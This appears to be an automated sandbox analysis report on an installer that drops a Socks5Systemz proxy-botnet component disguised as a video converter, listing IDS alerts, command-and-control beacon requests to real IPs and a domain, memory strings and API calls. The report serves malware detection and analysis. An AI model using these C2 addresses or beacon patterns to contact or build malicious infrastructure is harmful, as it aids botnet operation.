Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63191 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63185 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63172 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63182 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63224 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63203 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63211 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63216 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63208 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63209 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63229 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63194 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63227 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63186 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63198 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63220 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63235 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63214 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63213 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63233 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63226 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63190 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63188 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63215 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63222 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63221 -> 185.208.158.248:80
Source: Malware configuration extractor | URLs: diuzout.info
Source: unknown | Network traffic detected: HTTP traffic on port 2023 -> 63196
Source: unknown | Network traffic detected: HTTP traffic on port 63196 -> 2023
Source: global traffic | TCP traffic: 192.168.2.6:63162 -> 89.105.201.183:2023
Source: global traffic | HTTP traffic detected: GET /rand HTTP/1.1 | Host: 31.214.157.226 | Accept: */*
Source: Joe Sandbox View | IP Address: 185.208.158.248
Source: Joe Sandbox View | IP Address: 89.105.201.183
Source: Joe Sandbox View | ASN Name: SIMPLECARRER2IT
Source: global traffic | HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf712c5ec93993c HTTP/1.1 | Host: diuzout.info | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic | HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1 | Host: diuzout.info | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: unknown | TCP traffic detected without corresponding DNS query: 89.105.201.183 (19 connections, interleaved with those to 31.214.157.226)
        Source: unknown | TCP traffic detected without corresponding DNS query: 31.214.157.226 (6 connections)
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | UDP traffic detected without corresponding DNS query: 141.98.234.31
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Code function: 3_2_02D872AB Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,_memset,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,_memset,_memset,_memset,_malloc,_memset,_strtok,_swscanf,_strtok,_free,Sleep,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_memset,_free,3_2_02D872AB
        Source: global traffic | HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf712c5ec93993c HTTP/1.1 | Host: diuzout.info | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global traffic | HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1 | Host: diuzout.info | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) (identical request logged 41 times in this run)
        Source: global traffic | HTTP traffic detected: GET /rand HTTP/1.1 | Host: 31.214.157.226 | Accept: */* (logged twice)
        Source: global traffic | HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1 | Host: diuzout.info | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) (identical request logged 37 times in this run)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1Host: diuzout.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficDNS traffic detected: DNS query: 212.20.149.52.in-addr.arpa
        Source: global trafficDNS traffic detected: DNS query: diuzout.info
        Source: jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.1
        Source: jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/s
        Source: jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q
        Source: jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd83d5df22
        Source: jennyvideoconverter32_64.exe, 00000003.00000002.3335978046.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd83d5df220160
        Source: jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd83d5df2201606a51?a
        Source: jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12e
        Source: jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5
        Source: jennyvideoconverter32_64.exe, 00000003.00000002.3337778653.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948
        Source: jennyvideoconverter32_64.exe, 00000003.00000002.3335978046.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82d
        Source: jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd8Yo
        Source: jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?qbn1
        Source: N6jsQ3XNNX.exe, 00000000.00000002.3336120591.0000000002088000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.exe, 00000000.00000003.2095937284.0000000002310000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000003.2098858266.0000000002170000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000002.3336768727.0000000002160000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000002.3336281247.000000000073E000.00000004.00000020.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000003.2098757251.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://fsf.org/
        Source: is-73S5T.tmp.2.drString found in binary or memory: http://mingw-w64.sourceforge.net/X
        Source: is-7MVDI.tmp.2.drString found in binary or memory: http://tukaani.org/
        Source: is-7MVDI.tmp.2.drString found in binary or memory: http://tukaani.org/xz/
        Source: N6jsQ3XNNX.exe, 00000000.00000002.3336120591.0000000002088000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.exe, 00000000.00000003.2095937284.0000000002310000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000003.2098858266.0000000002170000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000002.3336768727.0000000002160000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000002.3336281247.000000000073E000.00000004.00000020.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000003.2098757251.0000000003180000.00000004.00001000.00020000.00000000.sdmp, is-DDT59.tmp.2.drString found in binary or memory: http://www.gnu.org/licenses/
        Source: N6jsQ3XNNX.tmp, N6jsQ3XNNX.tmp, 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-SAKD7.tmp.2.dr, N6jsQ3XNNX.tmp.0.drString found in binary or memory: http://www.innosetup.com/
        Source: N6jsQ3XNNX.exe, 00000000.00000003.2096777712.0000000002094000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.exe, 00000000.00000003.2096528597.0000000002310000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, N6jsQ3XNNX.tmp, 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-SAKD7.tmp.2.dr, N6jsQ3XNNX.tmp.0.drString found in binary or memory: http://www.remobjects.com/ps
        Source: N6jsQ3XNNX.exe, 00000000.00000003.2096777712.0000000002094000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.exe, 00000000.00000003.2096528597.0000000002310000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-SAKD7.tmp.2.dr, N6jsQ3XNNX.tmp.0.drString found in binary or memory: http://www.remobjects.com/psU

        System Summary

        barindex
        Source: jennyvideoconverter32_64.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: ET Ammeter Side 10.7.45.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0042F530 NtdllDefWindowProc_A,2_2_0042F530
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00423B94 NtdllDefWindowProc_A,2_2_00423B94
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004125E8 NtdllDefWindowProc_A,2_2_004125E8
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004789DC NtdllDefWindowProc_A,2_2_004789DC
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004573CC PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,2_2_004573CC
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0042E944: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,2_2_0042E944
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,2_2_004555D0
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeCode function: 0_2_0040840C0_2_0040840C
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004804C62_2_004804C6
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004709502_2_00470950
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004352D82_2_004352D8
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004677102_2_00467710
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0043036C2_2_0043036C
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004444D82_2_004444D8
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004345D42_2_004345D4
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004866042_2_00486604
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00444A802_2_00444A80
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00430EF82_2_00430EF8
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004451782_2_00445178
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0045F4302_2_0045F430
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0045B4D82_2_0045B4D8
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004875642_2_00487564
